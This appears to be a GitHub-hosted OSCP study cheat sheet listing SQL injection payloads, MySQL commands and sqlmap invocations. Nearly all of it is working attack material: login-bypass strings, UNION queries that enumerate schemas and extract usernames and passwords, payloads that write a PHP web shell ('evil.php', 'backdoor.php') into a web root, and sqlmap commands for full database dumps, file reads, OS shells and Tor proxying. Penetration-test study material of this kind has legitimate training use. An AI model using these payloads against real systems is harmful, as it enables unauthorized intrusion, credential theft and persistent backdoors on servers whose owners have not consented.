forked from sd-geek/OSCP
-
Notifications
You must be signed in to change notification settings - Fork 14
/
17 - Databases - HTTP
140 lines (104 loc) · 5.59 KB
/
17 - Databases - HTTP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
-------------------- SQL Injection --------------------
Bse:
any' or 1=1 limit 1;--
Number of columns:
order by 1, order by 2, ...
Expose data from database:
UNION select 1,2,3,4,5,6
Enum tables:
UNION select 1,2,3,4,table_name,6 FROM information_schema.tables
Shell upload:
<[IP]>:<[PORT]>/<[URL]>.php?<[PARAMETER]>=999 union select 1,2,"<?php echo shell_exec($_GET['cmd']);?>",4,5,6 into OUTFILE '/var/www/html/evil.php'
Authentication Bypass
name='wronguser' or 1=1;#
name='wronguser' or 1=1 LIMIT 1;#
-------------------- MySQL --------------------
Grab password hashes from a web application mysql database called “Users” - once you have the MySQL root username and password
# mysql -u root -p -h $ip
# use "Users"
# show tables;
# select * from users;
Connect to MySQL
# mysql -u username -p password -h <IP ADDRESS>
# show databases;
# show tables;
# select * from <DatabaseName>;
SQL injection sign up registration - register.php
Username: ' or 1='1
Password: ' or 1='1
Confirm password: ' or 1='1
Second Order SQL Injection Login watch for sql errors on page
Username: admin ‘) order by 3#
Password: pass
If less than 2 columns
Username: admin ‘) order by 2#
Password: pass
Can downgrade to single coumn.
Username: admin') union select 1,@@version#
Username: admin') union select 1,database()#
Username: admin') union select 1,group_concat(distinct table_schema) from information_schema.tables#
Username: admin') union select 1,group_concat(distinct table_name) from information_schema.columns where table_schema="sysadmin"
Username: admin') union select 1,group_concat(distinct column_name) from information_schema.columns where table_schema="sysadmin" and table_name="users"#
Username: admin') union select 1,group_concat(username,0x7c,password,0x0a) from sysadmin.users#
May expose username and passwords
-------------------- Enumerating the Database --------------------
Enumerating the Database
http://$ip/comment.php?id=738’
Verbose error message?
http://$ip/comment.php?id=738 order by 1
http://$ip/comment.php?id=738 union all select 1,2,3,4,5,6
Determine MySQL Version:
http://$ip/comment.php?id=738 union all select 1,2,3,4,@@version,6
Current user being used for the database connection
http://$ip/comment.php?id=738 union all select 1,2,3,4,user(),6
We can enumerate database tables and column structures
http://$ip/comment.php?id=738 union all select 1,2,3,4,table_name,6 FROM information_schema.tables
Target the users table in the database
http://$ip/comment.php?id=738 union all select 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='users'
Extract the name and password
http://$ip/comment.php?id=738 union select 1,2,3,4,concat(name,0x3a, password),6 FROM users
Create a backdoor
http://$ip/comment.php?id=738 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'
-------------------- SQLMap --------------------
Crawl the links
# sqlmap -u http://$ip --crawl=1
# sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3
SQLMap Search for databases against a suspected GET SQL Injection point ‘search’**
# sqlmap –u http://$ip/blog/index.php?search –dbs
SQLMap dump tables from database oscommerce at GET SQL injection point ‘search’
# sqlmap –u http://$ip/blog/index.php?search= –dbs –D oscommerce –tables –dumps
SQLMap GET Parameter command
# sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --dump -threads=5
SQLMap Post Username parameter
# sqlmap -u http://$ip/login.php --method=POST --data="[email protected]&password=1231" -p "usermail" --risk=3 --level=5 --dbms=MySQL --dump-all
SQL Map OS Shell
# sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --osshell
# sqlmap -u http://$ip/login.php --method=POST --data="[email protected]&password=1231" -p "usermail" --risk=3 --level=5 --dbms=MySQL --os-shell
Automated sqlmap scan
#sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/var/www/blah.php"
Targeted sqlmap scan
# sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-agent --dump
Scan url for union + error based injection with mysql backend and use a random user agent + database dump
# sqlmap -o -u http://$ip/index.php --forms --dbs
# sqlmap -o -u "http://$ip/form/" --forms
# sqlmap check form for injection
# sqlmap -o -u "http://$ip/vuln-form" --forms -D database-name -T users --dump
# sqlmap dump and crack hashes for table users on database-name.
Enumerate databases
# sqlmap --dbms=mysql -u "$URL" --dbs
Enumerate tables from a specific database
# sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables
Dump table data from a specific database and table
# sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump
Specify parameter to exploit
# sqlmap --dbms=mysql -u "http://www.example.com/param1=value1¶m2=value2" --dbs -p param2
Specify parameter to exploit in 'nice' URIs
# sqlmap --dbms=mysql -u "http://www.example.com/param1/value1\*/param2/value2" --dbs # exploits param1
Get OS shell
# sqlmap --dbms=mysql -u "$URL" --os-shell
Get SQL shell
# sqlmap --dbms=mysql -u "$URL" --sql-shell
SQL query
# sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --sql-query "SELECT * FROM $TABLE;"
Use Tor Socks5 proxy
# sqlmap --tor --tor-type=SOCKS5 --check-tor --dbms=mysql -u "$URL" --dbs